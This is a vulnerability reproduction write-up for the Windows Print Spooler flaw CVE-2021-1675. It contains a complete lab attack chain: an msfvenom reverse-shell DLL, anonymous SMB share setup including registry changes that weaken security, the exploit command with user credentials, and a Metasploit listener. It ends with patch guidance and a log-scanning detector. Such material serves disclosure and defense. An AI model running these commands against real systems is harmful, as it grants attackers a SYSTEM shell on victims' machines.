1. Vulnerability details
The Microsoft Windows Print Spooler service fails to restrict access to the RpcAddPrinterDriverEx() function, which may allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.
RpcAddPrinterDriverEx() is used to install a printer driver on the system. One of its parameters is a DRIVER_CONTAINER object, which carries information about which driver the added printer will use.
Another parameter, dwFileCopyFlags, specifies how replacement printer driver files are copied. The problem is that any authenticated user can call RpcAddPrinterDriverEx() and specify a driver file located on a remote server, which causes the Print Spooler service (spoolsv.exe) to execute code from an arbitrary DLL with SYSTEM privileges.
Affected versions:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
2. Vulnerability reproduction
Environment: host machine running Windows 11
Attacker machine: Kali virtual machine
IP address: 192.168.133.145
Network mode: NAT
Simulated victim machine: Windows Server 2016
IP address: 192.168.133.129
Network mode: NAT
2.1 Enable the printer service on Server 2016
This printer service is enabled by default; if it is not running, it can be turned on.
2.2 Generating the DLL file
On Kali, change to the tmp directory and use msfvenom to generate the DLL file; Cobalt Strike can also be used to generate it.
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.133.145 LPORT=3333 -o reverse.dll
2.3 SMB configuration
Configure the SMB service on Kali so that it allows anonymous access, which makes it convenient to deliver reverse.dll to the Windows Server 2016 host.
cat /etc/samba/smb.conf
sudo service smbd start
The contents of smb.conf are as follows:
[global]
workgroup = workgroup
server string = test
netbios name = MZ
security = user
map to guest = Bad User
smb ports = 445
log file = /var/log/samba/log.%m
max log size = 5
[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes
If you configure the SMB service on Windows instead, it can be set up as follows.
mkdir C:\share
icacls C:\share /T /grant Anonymous` logon:r
icacls C:\share /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot
After enabling anonymous SMB access on Kali, open \\192.168.133.145 from the Network view on Windows 11; if the smb share can be browsed, the configuration succeeded.
2.4 Downloading the scripts
Download this project from GitHub; here .cnpmjs.org is appended to the GitHub URL to speed up the download.
git clone https://github.com.cnpmjs.org/cube0x0/CVE-2021-1675.git
impacket also needs to be reinstalled.
pip3 uninstall impacket
git clone https://github.com.cnpmjs.org/cube0x0/impacket
cd impacket
sudo python3 ./setup.py install
Check whether the target is vulnerable: if the following command produces output, the vulnerability is present. This serves as a simple check.
rpcdump.py @192.168.133.1 | grep MS-RPRN
2.5 Exploitation
Run the following command from the script directory; hai:serverpass@2 is the username and password of an ordinary domain user on Server 2016.
python3 CVE-2021-1675.py hai:serverpass@2@192.168.133.129 '\\192.168.133.145\smb'
Set up a listener in msf:
msf6 > use multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.133.145
msf6 exploit(multi/handler) > set LPORT 3333
If the following error appears, anonymous SMB access has probably not been configured correctly.
A successful run looks like this:
Testing with Windows Server 2012 R2, I found that the file could be uploaded but not executed, so the reproduction did not succeed.
3. Mitigations
1. Microsoft has released security patches for the supported system versions that fix this vulnerability; official download link: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675.
2. Temporarily disable the Print Spooler service. In the Services application (services.msc), locate the Print Spooler service, stop it, and change its Startup type to Disabled.
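As an added defender-side example (not part of the original post), the following Python script scans Microsoft-Windows-PrintService/Admin events for the pattern described in section 1: a driver added through RpcAddPrinterDriverEx() whose file list points at a remote UNC share, plus the plug-in load failures the spooler logs when such a DLL is not a real driver. The sample event messages are constructed and their exact wording is an assumption; adjust the regexes to the text your environment produces.

```python
import re
from typing import Dict, List

# Constructed sample events in the shape of the Microsoft-Windows-PrintService/Admin
# log (Event 316 = driver added/updated, Event 808 = plug-in load failure).
# The message wording is an assumption, not copied from a real host.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 316, "Message": (
        "Printer driver Microsoft XPS Document Writer v4 for Windows x64 Version-4 "
        "was added or updated. Files:- C:\\Windows\\System32\\DriverStore\\FileRepository"
        "\\prnms001.inf_amd64_1\\MXDW.gpd. No user action is required.")},
    {"EventID": 316, "Message": (
        "Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- "
        "UNIDRV.DLL, kernelbase.dll, \\\\192.168.133.145\\smb\\reverse.dll. "
        "No user action is required.")},
    {"EventID": 808, "Message": (
        "The print spooler failed to load a plug-in module "
        "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\reverse.dll, error code 0x45A.")},
]

FILES_RE = re.compile(r"Files:-\s*(.*?)\.\s*No user action", re.S)
UNC_RE = re.compile(r"^\\\\[^\\]+\\")          # matches \\host\share\... paths
PLUGIN_RE = re.compile(r"plug-in module (.+?), error code")


def driver_files(message: str) -> List[str]:
    """Return the driver file list from an Event 316 message (empty if absent)."""
    m = FILES_RE.search(message)
    if not m:
        return []
    return [f.strip() for f in m.group(1).split(",") if f.strip()]


def suspicious_driver_events(events) -> List[Dict[str, str]]:
    """Flag driver installs that reference a remote (UNC) driver file, the pattern
    CVE-2021-1675 abuses, and plug-in load failures that follow a bad driver DLL."""
    findings = []
    for ev in events:
        eid, msg = ev["EventID"], str(ev["Message"])
        if eid == 316:
            remote = [f for f in driver_files(msg) if UNC_RE.match(f)]
            if remote:
                findings.append({"event_id": "316", "reason": "remote driver file",
                                 "detail": ", ".join(remote)})
        elif eid == 808:
            m = PLUGIN_RE.search(msg)
            findings.append({"event_id": "808", "reason": "plug-in load failure",
                             "detail": m.group(1) if m else msg})
    return findings


if __name__ == "__main__":
    for finding in suspicious_driver_events(SAMPLE_EVENTS):
        print(finding)
```

On a real host the events can be exported from the PrintService/Admin log (the Operational log must be enabled separately) and fed to suspicious_driver_events() as dictionaries with the same two keys.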
References
1. https://www.kb.cert.org/vuls/id/383432
2. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675
3. https://github.com/afwu/PrintNightmare
4. https://github.com/cube0x0/CVE-2021-1675